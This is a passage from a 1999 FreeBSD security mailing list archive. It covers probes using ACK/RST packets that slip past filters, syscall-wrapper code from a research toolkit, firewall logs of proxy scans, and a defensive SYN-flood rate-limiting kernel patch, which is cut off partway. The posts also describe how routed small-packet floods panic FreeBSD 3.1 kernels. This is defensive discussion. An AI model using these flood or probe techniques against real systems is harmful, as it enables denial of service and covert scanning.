mail server is probably the long-since-fixed root exploit in popper and imapd... if he is still getting broken into, he is running out of date software. The two are entirely separate issues. -Matt Matthew Dillon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 11 19:29:19 1999 Delivered-To: freebsd-security@freebsd.org Received: from noop.colo.erols.net (noop.colo.erols.net [207.96.1.150]) by hub.freebsd.org (Postfix) with ESMTP id 4772915A38 for ; Tue, 11 May 1999 19:28:43 -0700 (PDT) (envelope-from gjp@noop.colo.erols.net) Received: from localhost ([127.0.0.1] helo=noop.colo.erols.net) by noop.colo.erols.net with esmtp (Exim 2.12 #1) id 10hOlg-000K7J-00; Tue, 11 May 1999 22:29:08 -0400 To: Matthew Dillon Cc: Jim Cassata , freebsd-security@FreeBSD.ORG From: "Gary Palmer" Subject: Re: new type of attack? In-reply-to: Your message of "Tue, 11 May 1999 17:35:02 PDT." <199905120035.RAA80884@apollo.backplane.com> Date: Tue, 11 May 1999 22:29:04 -0400 Message-ID: <77332.926476144@noop.colo.erols.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Matthew Dillon wrote in message ID <199905120035.RAA80884@apollo.backplane.com>: > The network probe idea sounds interesting. The breech in this person's The scan sounds like something nmap would do. Gary -- Gary Palmer FreeBSD Core Team Member FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 11 23:52:10 1999 Delivered-To: freebsd-security@freebsd.org Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by hub.freebsd.org (Postfix) with ESMTP id 7260714DD7 for ; Tue, 11 May 1999 23:52:04 -0700 (PDT) (envelope-from avalon@cheops.anu.edu.au) Received: (from avalon@localhost) by cheops.anu.edu.au (8.9.1/8.9.1) id QAA05838; Wed, 12 May 1999 16:51:28 +1000 (EST) From: Darren Reed Message-Id: <199905120651.QAA05838@cheops.anu.edu.au> Subject: Re: Wrapping syscalls To: shadows@whitefang.com (Thamer Al-Herbish) Date: Wed, 12 May 1999 16:51:27 +1000 (EST) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: from "Thamer Al-Herbish" at May 11, 99 02:29:02 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Thamer Al-Herbish, sie said: > > On Wed, 12 May 1999, Darren Reed wrote: > > > Logging would be interesting, as would write'ing data to be sent > > back to the client :-) Lets hope they're not interested in using > > CGI either :-) > > You would need some granulity I suppose. Just looked at the TIS > post, it's been done and done well it seems. TIS post ? > > This isn't a capability based solution in the traditional sense of > > that term, more of a means being able to deny yourself use of certain > > system calls. > > Absolutely not. What you described is somewhat like a product from Axent. Capabilities are not tied to system calls, system calls just provide a user interface to them. Darern To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 12 2:34: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id F10B915CCF for ; Wed, 12 May 1999 02:33:13 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id FAA12507; Wed, 12 May 1999 05:33:03 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Wed, 12 May 1999 05:33:02 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: Darren Reed Cc: security@freebsd.org Subject: Generic Software Wrappers (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Since there have been a few questions about the reference I made to wrappers code from TIS, I'm forwarding the original mailing list announcement back to the list. Note: just because my .sig says TIS doesn't mean I know anything much about this particular project. :) Robert N Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 Carnegie Mellon University http://www.cmu.edu/ TIS Labs at Network Associates, Inc. http://www.tis.com/ Safeport Network Services http://www.safeport.com/ ---------- Forwarded message ---------- Date: Thu, 08 Apr 1999 17:17:35 -0400 From: Mark S Feldman To: freebsd-security@freebsd.org Cc: feldman@tislabs.com Subject: Generic Software Wrappers Almost 8 months back, I responded to a message on this list and described a research project we were working on. My message is below. At the end of the message, I said I would send another message to this list when we made our source available. Well, the first release of our Generic Software Wrappers Tool Kit -- still very much a research prototype -- is available. It runs under FreeBSD 2.2.x, Solaris 2.6, and, as much as we have ported to date, under Windows NT 4.0. We're limited to FreeBSD 2.2.x because we don't currently have the resources to port to 3.x. Check out ftp://ftp.tislabs.com/pub/wrappers if you're interested. Mark ------- Forwarded Message To: Philippe Regnauld cc: freebsd-security@freebsd.org, badger@tis.com, feldman@tis.com, Robert Watson Subject: Re: Fwd: "Using capabilties aaginst shell code" (fwd) Date: Wed, 19 Aug 1998 11:14:17 -0400 From: Mark S Feldman Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Content-Type: text Content-Length: 7470 Philippe, Your message to the freebsd-security list was passed to me. I'm the project leader for the Generic Software Wrappers project at TIS Labs at Network Associates. In short, under DARPA contract F30602-96-C-0333, we have developed a Wrapper Definition Language (WDL) based on 'C' which makes it easy to identify system events of interest (e.g., named system calls, all system calls containing a path parameter, system calls available only to root), to intercept them, and to deny, augment, or transform those events. We have developed a prototype under FreeBSD, including a wrapper compiler which compiles WDL into 'C', a Wrapper Support Subsystem implemented as a Loadable Kernel Module, and various support programs. We are currently porting to Solaris and Windows NT. Our source is not currently organized for distribution, but, once it is, it will be made available for free for non-commercial use. > Is this any form of restriction that can be implemented > in *BSD systems ? I.e.: restricting system calls to > certain classes of daemons ? One of our simpler wrappers is the noadmin wrapper, which prevents a wrapped process, even one running as root, from executing certain administrative system calls:: /* * $Id: noadmin.wr,v 1.5 1998/04/20 19:05:08 ko Exp $ * * noadmin.wr * * A wrapper that denies certain administrative syscalls. */ #include "../../wr.include/bsd.ch" wrapper noadmin { bsd::op{mount || unmount || ptrace || quotactl || acct || swapon || mknod || adjtime || ktrace || reboot || settimeofday} pre { return WR_DENY | WR_BADPERM; }; } In the wrapper, bsd.ch contains a characterization of the system API. It starts with the 'C' prototype, and then adds additional attributes that make it possible to group system calls and to deal with their parameters. The wrapper runs in the bsd domain and looks for the named operations. It intercepts before the operation occurs (pre keyword), prevents it from executing, making it appear to be a permission denied-type error. > As mentioned in the example below, why should POPd be allowed > to exec() ? This seems like a very sane approach (of course, > it implies knowledge/auditing of the code). In addition to our wrappers, which specify what events to look for and how to handle them, we have activation criteria, which determine which wrappers wrap a process. Activation criteria are simple boolean expressions which can be based on the uid, gid, program name, etc. If the pop daemon were named popd, the following activation criteria would cause it to be wrapped by the noadmin wrapper: prog == popd ==> noadmin As for not knowing what system calls a process needs to get the job done, it could first be run under a wrapper like dbcallcount, which tracks all system calls made by wrapped processes and uses Wrapper Query Language (WQL) to store call counts in our fast, lightweight database which can be viewed using our GUI or CLI from user space: /* * $Id: dbcallcount.wr,v 1.7 1998/08/06 19:45:17 ko Exp $ * * dbcallcount.wr * * This wrapper keeps track of the number of times each syscall is * attempted. * * Use the "wrselect" program to view the tables created. * */ #include "../../wr.include/bsd.ch" #include "../../wr.include/libwr.h" wrapper dbcallcount { DBTABLE callcountTable { char(20) key name; int count; }; callcountTable callcount; wr_activate() { int i; /* create the table. */ i = wql { create table callcount; }; if (i < 0) wr_printf("Error creating table.\n"); } wr_duplicate() { /* create the table. */ wql { create table callcount; }; } wr_deactivate() { /* Drop the table. */ wql { drop table callcount; }; } /* Catch all syscalls */ bsd::op{*} pre { int retVal; /* If syscall in in the db, increment count. */ /* If not, add the syscall to the database. */ retVal = wql { update callcount set .count = .count + 1 where .name = $$; }; if (retVal <= 0) { wql { insert into callcount values ($$, 1); }; } }; } > > Then we could have certain untrusted (i.e.: running as > root) daemons launched in such an environment, on top > of being chroot()ed. ... Yup. And wrappers provide a mechanism to do that. Take a look at the following wrapper which creates a simple, if silly, synthetic environment: /* * $Id: dbsynthetic.wr,v 1.5 1998/08/19 15:30:08 feldman Exp $ * * This wrapper provides a synthetic environment, doing string * substitutions on path names. * */ #include "../../wr.include/bsd.ch" #include "../../wr.include/libwr.h" wrapper dbsynthetic { /* Null-terminated array of substition string pairs. Each target * entry, if found in a path, will be replaced by the replacement * entry. Regular expressions, as defined in WDL, can be used for * the targets. */ DBTABLE path_table { char(256) target; char(256) replacement; }; DBTABLE alert_table { char(256) path; char(256) fullname; int pid; int uid; }; path_table global pathnames; alert_table global alerts; wr_install() { DBROW::path_table row; wql { create table pathnames; create table alerts; insert into pathnames values ( "/etc/master.passwd", "/etc/passwd"), ( "/kernel", "/etc/motd"), ( "/lkm", "/tmp"), ( "/usr/games", "/usr/bin"), ( "/usr/tmp", "/tmp"), ( "/var/tmp", "/tmp") ; select into row from pathnames; }; } wr_uninstall() { wql { drop table pathnames; drop table alerts; }; } /* Intercept all syscalls containing paths before they run */ bsd::pattr{path} pre { DBROW::path_table row; string fullname; int changed = 0; /* Attempt to convert path from relative to absolute. If * the conversion doesn't succeed, it's a bad path. This * would normally be the end, but since we may be * redirecting from a non-existent path to one that exists, * we'll proceed */ if ((fullname = wr_abspath($path)) == NULL) { fullname = wr_strdup($path); } wql { select into row from pathnames; }; do { /* Do string substitutions for each pair of pathnames * and remember if any occurred. */ if (fullname =~ s|row.target|row.replacement|) changed++; } while (row.next()); /* Write out an alert to the database and change the path * parameter if any substitutions occurred. */ if (changed) { wql { insert into alerts values ($path, fullname, _pid, _uid); }; $path = fullname; } /* Cleanup */ wr_free(fullname); }; } My response is undoubtedly way too long. I'll make sure that a message is sent to this list when we make our source available. In the mean time, if you have any questions, let me know. Mark - ----- Mark S. Feldman TIS Labs at Network Associates, Inc. phone: +1 301 854 6889 3060 Washington Road fax: +1 301 854 5363 Glenwood, Maryland 21738 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message ------- End of Forwarded Message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 12 7: 7: 9 1999 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 349C014DCA for ; Wed, 12 May 1999 07:07:06 -0700 (PDT) (envelope-from cy@cschuber.net.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id HAA02330; Wed, 12 May 1999 07:08:21 -0700 Received: from cschuber.net.gov.bc.ca(142.31.240.113), claiming to be "cwsys.cwsent.com" via SMTP by point.osg.gov.bc.ca, id smtpda02328; Wed May 12 07:08:05 1999 Received: (from uucp@localhost) by cwsys.cwsent.com (8.9.3/8.9.1) id HAA09671; Wed, 12 May 1999 07:06:47 -0700 (PDT) Message-Id: <199905121406.HAA09671@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdjc9667; Wed May 12 07:06:39 1999 X-Mailer: exmh version 2.0.2 2/24/98 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 2.2.8-RELEASE X-Sender: cy To: Jim Cassata Cc: freebsd-security@FreeBSD.ORG Subject: Re: new type of attack? In-reply-to: Your message of "Tue, 11 May 1999 18:57:38 EDT." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 12 May 1999 07:06:39 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message , Jim Cas sata writes: > i just received this.... > > > We have been tracking a long series of subtle network probes that > >use TCP packets constructed with ACK and RST bits set. This bit > >combination allows these packets to pass through common packet filters. > >The attackers have breached many systems around the net, focusing on > >Linux and FreeBSD systems. These breached systems are used to either > >receive directly or through packet sniffing the responses from forged > >packets sent by the attackers. On Sunday (5-9-99), we collected some > >probe packets from address 209.54.43.133. This host is called > >sex.fiend.cx and appears to be part of your network. There is a strong > >possiblity that this host or one very near it has been breached and is > >being used to collect data probed from other networks. Our logs go back > >over a month and this is the first time this particular host has been > >seen on our network. The attackers seem to be able to move on to new > >systems very quickly as there are apparently plenty of vulnerable > >systems to breach. Our mail server was breached back in December and > >was used for similar activities for 2 days. The attackers created 2 > >accounts, udp and reboot. The udp account had root privs and no > >password. > > > >The time of the probe was 14:05 CDT > > has anyone seen this kind of thing? A lot of this depends on how well your packet filter rules are structured to mitigate the effectiveness of this kind of probing. Disallowing all outgoing sessions (any and all sessions), except through a bastion host on a DMZ, would be the best approach. The other approach would be to place the rules that allow outgoing packets with SYN at the end of the rule list prior to the global deny rule. All of this would, of course, depend on the rules prior to the last few rules. In other words there is no band-aid solution. Your rules need to be carefully thought out and in a sequence that will make each one effective, especially the last ones. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Open Systems Group Internet: Cy.Schubert@uumail.gov.bc.ca ITSD Cy.Schubert@gems8.gov.bc.ca Province of BC "e**(i*pi)+1=0" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 12 17:24:19 1999 Delivered-To: freebsd-security@freebsd.org Received: from rage.arpa.com (rage.arpa.com [199.245.173.3]) by hub.freebsd.org (Postfix) with ESMTP id 218B914DBF; Wed, 12 May 1999 17:23:45 -0700 (PDT) (envelope-from jamie@rage.arpa.com) Received: (from jamie@localhost) by rage.arpa.com (8.9.3/8.9.3) id TAA12987; Wed, 12 May 1999 19:14:21 -0500 (CDT) Date: Wed, 12 May 1999 19:14:21 -0500 From: Jamie Rishaw To: "Jordan K. Hubbard" Cc: Mike Smith , Seth , freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG, jamie@exodus.net Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) Message-ID: <19990512191420.A12813@rage.arpa.com> References: <199905040140.SAA01305@dingo.cdrom.com> <30986.925789368@zippy.cdrom.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <30986.925789368@zippy.cdrom.com>; from Jordan K. Hubbard on Mon, May 03, 1999 at 08:42:48PM -0700 X-No-Archive: Yes X-Face: d=) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Problem: FreeBSD kernel panics under SYN attack. Solution seems to be modifying: net.inet.ip.rtexpire: 12 net.inet.ip.rtminexpire: 10 Discuss. -jamie To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 12 18: 9:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from server.pentalpha.com.hk (unknown [210.176.109.29]) by hub.freebsd.org (Postfix) with ESMTP id C218914E7C for ; Wed, 12 May 1999 18:09:43 -0700 (PDT) (envelope-from danny@pentalpha.com.hk) Received: from domain (danny [10.0.0.111]) by server.pentalpha.com.hk (8.9.1a/8.9.1) with SMTP id JAA18159 for ; Thu, 13 May 1999 09:09:42 +0800 (CST) Message-ID: <000201be9cdd$46a868a0$6f00000a@domain.pentalpha.com.hk> From: "danny" To: Subject: network scan? Date: Thu, 13 May 1999 09:05:42 +0800 MIME-Version: 1.0 Content-Type: text/plain; charset="big5" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.3110.5 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I found the following from the log file. What those people doing? May 12 18:42:24 server /kernel: ipfw: 26000 Deny TCP 202.38.248.205:4359 a.b.c.1:1080 in via ed0 May 12 18:42:27 server /kernel: ipfw: 26000 Deny TCP 202.38.248.205:4359 a.b.c.1:1080 in via ed0 May 12 18:42:27 server /kernel: ipfw: 26000 Deny TCP 202.38.248.205:4401 a.b.c.15:1080 in via ed0 May 12 18:42:30 server /kernel: ipfw: 26000 Deny TCP 202.38.248.205:4401 a.b.c.15:1080 in via ed0 May 12 23:49:19 server /kernel: ipfw: 26000 Deny TCP 202.103.173.116:4196 a.b.c.1:1080 in via ed0 May 12 23:49:20 server /kernel: ipfw: 26000 Deny TCP 202.103.173.116:4210 a.b.c.15:1080 in via ed0 danny To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 12 19:22:57 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id 397E114DAF for ; Wed, 12 May 1999 19:22:55 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id TAA90284; Wed, 12 May 1999 19:22:51 -0700 (PDT) (envelope-from dillon) Date: Wed, 12 May 1999 19:22:51 -0700 (PDT) From: Matthew Dillon Message-Id: <199905130222.TAA90284@apollo.backplane.com> To: "danny" Cc: Subject: Re: network scan? References: <000201be9cdd$46a868a0$6f00000a@domain.pentalpha.com.hk> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :I found the following from the log file. What those people doing? : : :May 12 18:42:24 server /kernel: ipfw: 26000 Deny TCP 202.38.248.205:4359 :a.b.c.1:1080 in via ed0 :... I get this all the time from people scanning for netbios. I usually just ignore them. If I'm in a bad mood I send a nasty gram to the originating network. -Matt Matthew Dillon ipfw: 2010 Unreach UDP 209.156.6.31:1142 209.157.86.2:161 in via de0 :... ipfw: 2010 Unreach UDP 209.156.6.31:1142 209.157.86.63:161 in via de0 :... ipfw: 2010 Unreach UDP 209.156.6.31:137 209.157.86.63:137 in via de0 :... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 12 19:47:37 1999 Delivered-To: freebsd-security@freebsd.org Received: from adelphi.physics.adelaide.edu.au (adelphi.physics.adelaide.edu.au [129.127.36.247]) by hub.freebsd.org (Postfix) with ESMTP id C2F20151A0 for ; Wed, 12 May 1999 19:47:33 -0700 (PDT) (envelope-from kkennawa@physics.adelaide.edu.au) Received: from bragg (bragg [129.127.36.34]) by adelphi.physics.adelaide.edu.au (8.8.8/8.8.8/UofA-1.5) with SMTP id MAA11171; Thu, 13 May 1999 12:17:31 +0930 (CST) Received: from localhost by bragg; (5.65/1.1.8.2/05Aug95-0227PM) id AA32122; Thu, 13 May 1999 12:18:17 +0930 Date: Thu, 13 May 1999 12:18:16 +0930 (CST) From: Kris Kennaway X-Sender: kkennawa@bragg To: Matthew Dillon Cc: danny , freebsd-security@freebsd.org Subject: Re: network scan? In-Reply-To: <199905130222.TAA90284@apollo.backplane.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 12 May 1999, Matthew Dillon wrote: > :May 12 18:42:24 server /kernel: ipfw: 26000 Deny TCP 202.38.248.205:4359 > :a.b.c.1:1080 in via ed0 > :... > > I get this all the time from people scanning for netbios. I > usually just ignore them. If I'm in a bad mood I send a nasty gram > to the originating network. In this case they're looking for an open SOCKS proxy (so they can use it to bounce attacks against other machines, most likely). I usually do what Matt does as well - if they're scanning really heavily then I might slap a blanket ban on their IP address(es). Don't forget though that TCP connection initiations (i.e. the initial step of the 3-way handshake) can be forged if they're designed to just bounce off your firewall (i.e. not actually connect to anything which may be listening) - so watch out for cutting off connectivity to a legitimate client. > :... > ipfw: 2010 Unreach UDP 209.156.6.31:1142 209.157.86.63:161 in via de0 > :... > ipfw: 2010 Unreach UDP 209.156.6.31:137 209.157.86.63:137 in via de0 > :... > > Windows machines like to attempt NetBIOS connections to machines on the internet when you do things like connect to a website - a lot of the UDP 137-139 traffic is harmless noise (AFAIK it always connects from port 13x to port 13x as in the above example). There's no excuse for probing SNMP ports though. Kris ---- "That suit's sharper than a page of Oscar Wilde witticisms that's been rolled up into a point, sprinkled with lemon juice and jabbed into someone's eye" "Wow, that's sharp!" - Ace Rimmer and the Cat, _Red Dwarf_ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 13 0: 5:32 1999 Delivered-To: freebsd-security@freebsd.org Received: from lab321.ru (unknown [62.76.128.34]) by hub.freebsd.org (Postfix) with ESMTP id 8717815189 for ; Thu, 13 May 1999 00:04:58 -0700 (PDT) (envelope-from kev@lab321.ru) Received: (from kev@localhost) by lab321.ru (8.9.3/8.9.3) id OAA09964 for security@freebsd.org; Thu, 13 May 1999 14:04:47 +0700 (OSS) Date: Thu, 13 May 1999 14:04:47 +0700 (OSS) From: Eugeny Kuzakov Message-Id: <199905130704.OAA09964@lab321.ru> To: security@freebsd.org Subject: KKIS.05051999.003b Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org hi, all. What about patches for 2.2-stable? Thanks. Eugeny. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 13 15:18:10 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id C319314D59 for ; Thu, 13 May 1999 15:18:05 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id QAA18551 for ; Thu, 13 May 1999 16:18:00 -0600 (MDT) Message-Id: <4.2.0.37.19990513161529.00c1e3f0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta) Date: Thu, 13 May 1999 16:17:57 -0600 To: security@FreeBSD.ORG From: Brett Glass Subject: Forwarded from BUGTRAQ: SYN floods against FreeBSD Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="=====================_194487001==_" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --=====================_194487001==_ Content-Type: text/plain; charset="us-ascii"; format=flowed Approved-By: aleph1@UNDERGROUND.ORG Received: from puffer.quadrunner.com (humble@puffer.quadrunner.com [205.166.195.4]) by netspace.org (8.8.7/8.8.7) with ESMTP id OAA19748 for ; Thu, 13 May 1999 14:33:55 -0400 Received: from localhost (humble@localhost) by puffer.quadrunner.com (8.9.2/QUAD-2.1) with ESMTP id LAA25414 for ; Thu, 13 May 1999 11:35:43 -0700 (PDT) X-Authentication-Warning: puffer.quadrunner.com: humble owned process doing -bs X-Sender: humble@puffer.quadrunner.com MIME-Version: 1.0 X-Security: Warning! Do not open programs, Word documents, or Excel spreadsheets received via e-mail if you do not have virus protection or if you did not expect to receive them. $Revision: 1.82 $Date: 1999-04-02 19:08:30-08 Message-ID: Date: Thu, 13 May 1999 11:35:43 -0700 Reply-To: Richard Steenbergen Sender: Bugtraq List From: Richard Steenbergen Subject: SYN floods against FreeBSD To: BUGTRAQ@netspace.org X-UIDL: e550992228b0a18c61e5aa464da42206 Here's a quickie for the people who have been plagued with high bandwidth syn flood attacks, a kernel patch for FreeBSD 3.1-STABLE which rate limits SYN processing. Its messy but functional and I don't have time to make it better (thats the fbsd developers job, not mine :P), cd /usr/src/sys, patch < synlim, add "options SYN_RATELIM" (I highly recommend ICMP_BANDLIM as well) to your kernel, recompile, and sysctl net.inet.tcp.synlim will be available (default to 100). This is the maximium number of SYNs per second that will be processed, the rest will be silently discarded. On my test system (P2 450 running 3.1-stable being hit w/15,000 packets per sec), this has successfully brought CPU usage from 100% to ~20% (against an open port which is replying with unacknowledged ACKs). Which brings us to the more sticky topic of kernel panics when under SYN flood (which I believe to be the cause of some earlier posts from certain people at Exodus Communications *cough*). Lord knows I found enough of them when doing this testing, but the one that seems to be the biggie for crashing when under syn flood is as follows (heh just turned off the synlim and panic'd within 8 seconds while writing this): panic: free: multiple frees (kgdb) bt #0 boot (howto=256) at ../../kern/kern_shutdown.c:285 #1 0xc0138c09 in panic (fmt=0xc02192b7 "free: multiple frees") at ../../kern/kern_shutdown.c:446 #2 0xc0135aaf in free (addr=0xc0cdd600, type=0xc0239330) at ../../kern/kern_malloc.c:333 #3 0xc01768f4 in ifafree (ifa=0xc0cdd600) at ../../net/route.c:262 #4 0xc0176876 in rtfree (rt=0xc34ce700) at ../../net/route.c:236 #5 0xc0176c84 in rtrequest (req=2, dst=0xc34cbac0, gateway=0xc34cbad0, netmask=0x0, flags=393223, ret_nrt=0x0) at ../../net/route.c:536 #6 0xc017b34d in in_rtqkill (rn=0xc34ce700, rock=0xc0231610) at ../../netinet/in_rmx.c:242 #7 0xc0176064 in rn_walktree (h=0xc0cd9e00, f=0xc017b2fc , w=0xc0231610) at ../../net/radix.c:956 #8 0xc017b3ec in in_rtqtimo (rock=0xc0cd9e00) at ../../netinet/in_rmx.c:283 #9 0xc013d19b in softclock () at ../../kern/kern_timeout.c:124 Which after a quick examination seems to be a perioditic routing table cleanup. It seems that in_rtqtimo is scheduled to run every net.inet.ip.rtexpire seconds (which is dynamicly adjusted and can never go lower then net.inet.ip.rtminexpire). When the system is under heavy load from processing lots of small packets (they don't even have to be SYNs, anything which can get routed will do the trick, though the packet kiddies would get very little gain from just sending an ip header since its going to be padded to 64 bytes for the eth frame anyhow), this route cleanup code will go wacking at routes it shouldn't and free some memory twice. In the course of testing I've gotten my rtq_reallyold to -3 and seen lots of "tvotohz: negative time difference -2 sec 0 usec". Perhaps someone with free time or more specific knowledge of this area would like to FIX IT? =) Perhaps when I get more free time I'll test some other *nix's. I would really recommend putting all this rate limiting code at an ipfw level. If you would like to contact me regarding this please use humble@quadrunner.com (at least if you want a quick reply), thanks. -- Richard Steenbergen humble@EFNet PGP ID: 0x741D0374 PGP Key Fingerprint: C6EF EFA0 83B2 071F 1AB6 B879 1F70 4303 741D 0374 http://users.quadrunner.com/humble --=====================_194487001==_ Content-Type: text/plain; charset="us-ascii" *** conf/options.old Sat May 15 23:08:03 1999 --- conf/options Sat May 15 23:40:21 1999 *************** *** 68,73 **** --- 68,74 ---- SYSVSHM opt_sysvipc.h UCONSOLE ICMP_BANDLIM + SYN_RATELIM # POSIX kernel options P1003_1B opt_posix.h *** netinet/tcp_var.h.old Sat May 15 23:25:39 1999 --- netinet/tcp_var.h Sat May 15 23:45:05 1999 *************** *** 40,45 **** --- 40,49 ---- * Kernel variables for tcp. */ + #ifdef KERNEL + #include "opt_syn_ratelim.h" + #endif + /* * Tcp control block, one per tcp; fields: * Organized for 16 byte cacheline efficiency. *************** *** 305,311 **** #define TCPCTL_RECVSPACE 9 /* receive buffer space */ #define TCPCTL_KEEPINIT 10 /* receive buffer space */ #define TCPCTL_PCBLIST 11 /* list of all outstanding PCBs */ ! #define TCPCTL_MAXID 12 #define TCPCTL_NAMES { \ { 0, 0 }, \ --- 309,316 ---- #define TCPCTL_RECVSPACE 9 /* receive buffer space */ #define TCPCTL_KEEPINIT 10 /* receive buffer space */ #define TCPCTL_PCBLIST 11 /* list of all outstanding PCBs */ ! #define TCPCTL_SYNLIM 12 /* Rate limiting of SYNs */ ! #define TCPCTL_MAXID 13 #define TCPCTL_NAMES { \ { 0, 0 }, \ *************** *** 320,325 **** --- 325,331 ---- { "recvspace", CTLTYPE_INT }, \ { "keepinit", CTLTYPE_INT }, \ { "pcblist", CTLTYPE_STRUCT }, \ + { "synlim", CTLTYPE_INT }, \ } #ifdef KERNEL *** netinet/tcp_input.c.old Sat May 15 23:08:10 1999 --- netinet/tcp_input.c Sun May 16 01:33:51 1999 *************** *** 72,77 **** --- 72,85 ---- static struct tcpiphdr tcp_saveti; #endif + #ifdef SYN_RATELIM + static int synlim = 100; + SYSCTL_INT(_net_inet_tcp, TCPCTL_SYNLIM, synlim, CTLFLAG_RW, &synlim, 0, ""); + #else + static int synlim = -1; + SYSCTL_INT(_net_inet_tcp, TCPCTL_SYNLIM, synlim, CTLFLAG_RD, &synlim, 0, ""); + #endif + static int tcprexmtthresh = 3; tcp_seq tcp_iss; tcp_cc tcp_ccgen; *************** *** 98,104 **** struct tcpiphdr *, struct mbuf *)); static int tcp_reass __P((struct tcpcb *, struct tcpiphdr *, struct mbuf *)); static void tcp_xmit_timer __P((struct tcpcb *, int)); ! /* * Insert segment ti into reassembly queue of tcp with --- 106,112 ---- struct tcpiphdr *, struct mbuf *)); static int tcp_reass __P((struct tcpcb *, struct tcpiphdr *, struct mbuf *)); static void tcp_xmit_timer __P((struct tcpcb *, int)); ! static int syn_ratelim(void); /* * Insert segment ti into reassembly queue of tcp with *************** *** 130,135 **** --- 138,183 ---- } \ } + #ifdef SYN_RATELIM + int syn_ratelim(void) + { + static int lticks; + static int lpackets; + int dticks; + + /* + * Return ok status if feature disabled or argument out of + * ranage. + */ + + if (synlim <= 0) + return(0); + + dticks = ticks - lticks; + + /* + * reset stats when cumulative dt exceeds one second. + */ + + if ((unsigned int)dticks > 